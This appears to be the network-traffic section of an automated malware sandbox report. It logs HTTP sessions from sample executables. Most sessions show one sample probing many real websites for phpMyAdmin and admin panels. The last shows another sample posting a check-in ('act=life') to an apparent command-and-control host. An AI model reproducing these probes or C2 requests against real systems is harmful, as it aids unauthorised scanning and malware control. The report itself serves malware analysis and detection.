                                                                                                                                                                                                                                                                                                                                                                Data Ascii: var fps=0, fps_sum=0, fps_all=0;var wind=(Math.random()-Math.random())/100;var mousex, mousey=0;var fpsdown=0;// MaininitHeader();addListeners();function initHeader() {width = $('#admin_bing_bg_wrapper
Feb 5, 2024 12:16:13.331942081 CET | 1286 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: uestAnimFrame(){if(!lastCalledTime) {lastCalledTime = Date.now();fps = 0;return;}delta = (Date.now() - lastCalledTime)/1000;lastCalledTime = Date.now();fps = 1/delta;fps_sum++;fps_all=fps_al
Feb 5, 2024 12:16:13.331954956 CET | 1286 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: _this.alpha = 0;_this.scale = 1+Math.random()*2;_this.velocity = Math.random();_this.life = 0;_this.speed = 0.01+Math.random()/100;}this.draw = function() {if(_this.alpha < 0 || _this.life>2 || _
Feb 5, 2024 12:16:13.339535952 CET | 1133 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ss="login"><form action="" method="POST" class="nicecheck"><input type="text" name="uname" placeholder="Username" required /><br><br><input type="password" name="pass" placeholder="Password" required /><br><br><cen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
566 | 192.168.2.6 | 50039 | 31.13.65.1 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.870824099 CET | 177 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: web.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.972733974 CET | 211 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://web.facebook.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
567 | 192.168.2.6 | 50001 | 64.190.63.136 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.871021986 CET | 221 | OUT | GET /admin?sub1=20240205-2216-12ca-876d-f5344b7b6169 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ww16.followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.081279993 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
568 | 192.168.2.6 | 50131 | 31.13.65.1 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:13.173531055 CET | 172 | OUT | GET /pma/ HTTP/1.1
Host: hi-in.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:13.275161982 CET | 206 | IN | HTTP/1.1 301 Moved Permanently
Location: https://hi-in.facebook.com/pma/
Content-Type: text/plain
Server: proxygen-bolt
Date: Mon, 05 Feb 2024 11:16:13 GMT
Connection: keep-alive
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
569 | 192.168.2.6 | 50136 | 77.240.114.212 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:13.173790932 CET | 166 | OUT | GET /pma/ HTTP/1.1
Host: mw.redsa.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:13.391402006 CET | 423 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:11 GMT
Server: Apache
Location: https://mw.redsa.net/pma/
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://mw.redsa.net/pma/">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
570 | 192.168.2.6 | 50221 | 54.71.181.160 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:13.173834085 CET | 177 | OUT | GET /admin/ HTTP/1.1
Host: ucivirtual.uci.edu.mx
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:14.464720964 CET | 960 | IN | HTTP/1.1 303 See Other
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Language: es-mx
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://ucivirtual.uci.edu.mx/admin/index.php?cache=1
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/7.2.7
X-Accel-Buffering: no
Set-Cookie: MoodleSession=83d9cfbk68lcntrdj2be5fingm; path=/
Date: Mon, 05 Feb 2024 11:15:29 GMT
Content-Length: 499
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="es-mx" xml:lang="es-mx"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Redireccionar</title></head><body><div style="margin-top: 3em; margin-left:auto; margin-right:auto; text-align:center;">Esta pgina debera redireccionar automticamente. Si no ocurre nada, por favor utilice el enlace de continuar que aparece ms abajo.<br /><a href="http://ucivirtual.uci.edu.mx/admin/index.php?cache=1">Continuar</a></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
571 | 192.168.2.6 | 50234 | 142.250.105.84 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:13.194952965 CET | 178 | OUT | GET /admin.php HTTP/1.1
Host: accounts.google.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:13.316575050 CET | 483 | IN | HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Feb 2024 11:16:13 GMT
Location: https://accounts.google.com/admin.php
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 182
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.316586971 CET182INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef 49 bd 96 18 d0 1a 6b 41 11 24 87 f6 18 62 30 82 31 41 63 a1 7f df 98 f6 d8 b9 2c 3b 3b 0c 6f 49 cd db 86 26 a4 66 79 19 06 bf f3 86 d1 d6 be d4 00 b8 32 ce ae 62 9d e6 37 c1 df
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EHIkA$b01Ac,;;oI&fy2b7CB/Xtkt}OU=xXQM7Z-6`bYA.)B,3-iV"8(P1'


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
572 | 192.168.2.6 | 50237 | 104.21.5.25 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:13.211653948 CET | 169 | OUT | GET /admin HTTP/1.1
Host: opsu.terna.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:13.338767052 CET | 701 | IN | HTTP/1.1 307 Temporary Redirect
Date: Mon, 05 Feb 2024 11:16:13 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Location: https://terna.net
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B8VnGjlCnQhS1ps%2FF4apm2Qd3VKCi9pg9bey%2F8ComWOpdEwKGlr%2FVZKPuRv9x6zwVzHCMIjP6nIJYq3yX5PduGAvHxxbsF0YydS0Gad6X7GjJ8Ve5AqTkljyklEYW%2BBTXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abd6ee8f4b0e2-ATL
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
573 | 192.168.2.6 | 50238 | 103.224.182.210 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:13.247138977 CET | 175 | OUT | GET /admin/ HTTP/1.1
Host: followerstiktok.xyz
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:13.429506063 CET | 343 | IN | HTTP/1.1 302 Found
date: Mon, 05 Feb 2024 11:16:13 GMT
server: Apache
set-cookie: __tad=1707131773.8789606; expires=Thu, 02-Feb-2034 11:16:13 GMT; Max-Age=315360000
location: http://ww16.followerstiktok.xyz/admin/?sub1=20240205-2216-13fb-b4a4-baa2c3c98c38
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
Data Raw: 0a 0a
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
574 | 192.168.2.6 | 50264 | 142.250.105.84 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:13.329305887 CET | 173 | OUT | GET /pma/ HTTP/1.1
Host: accounts.google.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:13.455708027 CET | 478 | IN | HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Feb 2024 11:16:13 GMT
Location: https://accounts.google.com/pma/
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Content-Length: 178
Server: GSE
Feb 5, 2024 12:16:13.455732107 CET | 178 | IN | Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef a6 bd 96 18 d0 1a 6b 41 11 24 87 f6 18 e2 62 0a c6 48 8c 85 fe 7d 63 da 63 e7 b2 ec ec 30 bc a5 b5 68 1b 96 d0 9a e7 65 18 e2 26 1a ce 5a fb 82 01 09 30 8b 75 d2 3d a7 37 25 df
Data Ascii: m0D~EHkA$bH}cc0he&Z0u=7%CB/XtKt}UFEXQx=kn"4+21GsT~YH65'H5d1`%9K;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
575 | 192.168.2.6 | 50351 | 170.114.52.4 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:13.395504951 CET | 170 | OUT | GET /admin HTTP/1.1
Host: us04web.zoom.us
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:13.539329052 CET | 1012 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:13 GMT
Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 134
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://us04web.zoom.us/admin
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=nonX9lA4Bp28X4P7a5xe5bcJPRFbPY0w140CDdtpy40-1707131773-1-AUuSXHcmel1yaisKndlzWUA88gy9kPVbBTLJ2IREa9ePHncIC45K2FJ5amTE7xZliJDd91hT6fQBblWos7Aw7u4=; path=/; expires=Mon, 05-Feb-24 11:46:13 GMT; domain=.us04web.zoom.us; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RAXoQ6SPSGvCmFPLTCkEgmh%2ByQCFCQrf7UKoRHG4xHopEkF3e6Dw679obJum%2FfATGmQN6soglfWjdFpywl95PuC4Mx8R6euc0oGkmRna7KyWEIlPs3oFwaDQz8dulRYhRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd700ef9ad94-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
576 | 192.168.2.6 | 50360 | 3.161.136.2 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:13.395751953 CET | 179 | OUT | GET /admin.php HTTP/1.1
Host: accounts.binance.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:13.497476101 CET | 579 | IN | HTTP/1.1 301 Moved Permanently
Server: CloudFront
Date: Mon, 05 Feb 2024 11:16:13 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Location: https://accounts.binance.com/admin.php
X-Cache: Redirect from cloudfront
Via: 1.1 995613db19b5d036af774654ce47e9fa.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ATL59-P4
X-Amz-Cf-Id: AhfioYrMJyWX2ee3LcyatTyrIFSncD3sI-lhGtNYBmcSIRFXlSknwg==
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
577 | 192.168.2.6 | 50235 | 124.237.208.37 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:13.443566084 CET | 169 | OUT | GET /admin/ HTTP/1.1
Host: pan.baidu.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:13.810928106 CET | 1280 | IN | Data Raw: [binary data]
Feb 5, 2024 12:16:13.810940027 CET | 1280 | IN | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 05 Feb 2024 11:16:13 GMT
Etag: W/"62650964-3feb"
Logid: 8900821692746961147
P3p: CP=" OTI DSP COR IVA OUR IND COM "
Server: nginx
Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
Set-Cookie: BAIDUID=342CDDB632C0EDB874E5202F1BA7A945:FG=1; expires=Tue, 04-Feb-25 11:16:13 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: BaiduCloud
Yld: 8900821692746961147
Yme: ZIGW/y8rX0sMajEFUmr/tG5Nv+UfTwfrrwBFwSCCnP+wTlk3OCccCoaD3A==
Transfer-Encoding: chunked
Feb 5, 2024 12:16:13.810950041 CET | 338 | IN | Data Raw: [binary data]
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.810959101 CET7INData Raw: 32 0d 0a 00 00 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.810970068 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.814790964 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
Feb 5, 2024 12:16:14.019889116 CET | 1280 | IN | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 05 Feb 2024 11:16:13 GMT
Etag: W/"62650964-3feb"
Logid: 8900821692746961147
P3p: CP=" OTI DSP COR IVA OUR IND COM "
Server: nginx
Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
Set-Cookie: BAIDUID=342CDDB632C0EDB874E5202F1BA7A945:FG=1; expires=Tue, 04-Feb-25 11:16:13 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: BaiduCloud
Yld: 8900821692746961147
Yme: ZIGW/y8rX0sMajEFUmr/tG5Nv+UfTwfrrwBFwSCCnP+wTlk3OCccCoaD3A==
Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
578 | 192.168.2.6 | 50357 | 186.113.7.204 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:13.472697020 CET | 181 | OUT | GET /pma/ HTTP/1.1
Host: oferta.senasofiaplus.edu.co
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:13.658293009 CET | 144 | IN | HTTP/1.0 302 Moved Temporarily
Location: https://oferta.senasofiaplus.edu.co/pma/
Server: BigIP
Connection: Keep-Alive
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
579 | 192.168.2.6 | 50342 | 31.216.144.5 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:13.483145952 CET | 162 | OUT | GET /admin HTTP/1.1
Host: mega.nz
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:13.682991028 CET | 195 | IN | HTTP/1.1 301 Moved Permanently
Content-Length: 0
Location: https://mega.nz
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: MEGA-Chrome-Antileak
Access-Control-Max-Age: 86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
580 | 192.168.2.6 | 50414 | 31.13.88.1 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:13.510015965 CET | 179 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: th-th.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:13.612258911 CET | 213 | IN | HTTP/1.1 301 Moved Permanently
Location: https://th-th.facebook.com/phpMyAdmin/
Content-Type: text/plain
Server: proxygen-bolt
Date: Mon, 05 Feb 2024 11:16:13 GMT
Connection: keep-alive
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
581 | 192.168.2.6 | 50440 | 44.199.96.179 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:13.531352043 CET | 175 | OUT | GET /pma/ HTTP/1.1
Host: pxndx-mcr.boletia.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:13.647356033 CET | 394 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:13 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Server: nginx/1.12.2
Location: https://pxndx-mcr.boletia.com/pma/
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.12.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
582 | 192.168.2.6 | 50463 | 34.149.46.130 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:13.574131012 CET | 177 | OUT | GET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:13.676585913 CET | 206 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.snapchat.com:443/admin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
583 | 192.168.2.6 | 50378 | 76.223.26.96 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:13.574773073 CET | 196 | OUT | GET /admin?usid=27&utid=4923818255 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ww12.chainmine.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
584 | 192.168.2.6 | 50449 | 64.190.63.136 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:13.640456915 CET | 222 | OUT | GET /admin/?sub1=20240205-2216-13fb-b4a4-baa2c3c98c38 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ww16.followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:13.849565983 CET | 88 | IN | HTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
585 | 192.168.2.6 | 50370 | 164.100.213.210 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:13.726046085 CET | 171 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ssc.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:21.517009020 CET | 139 | IN | HTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://ssc.nic.in/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Server: web_server
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
586 | 192.168.2.6 | 50527 | 142.250.105.84 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:13.740485907 CET | 173 | OUT | GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:13.868469954 CET | 478 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/pma/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Server: GSE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49707 | 172.67.217.100 | 443 | 7100 | C:\Users\user\AppData\Local\Temp\FE8B.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:12:24 UTC | 271 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                                Host: resergvearyinitiani.shop
2024-02-05 11:12:24 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-02-05 11:12:25 UTC | 812 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:25 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
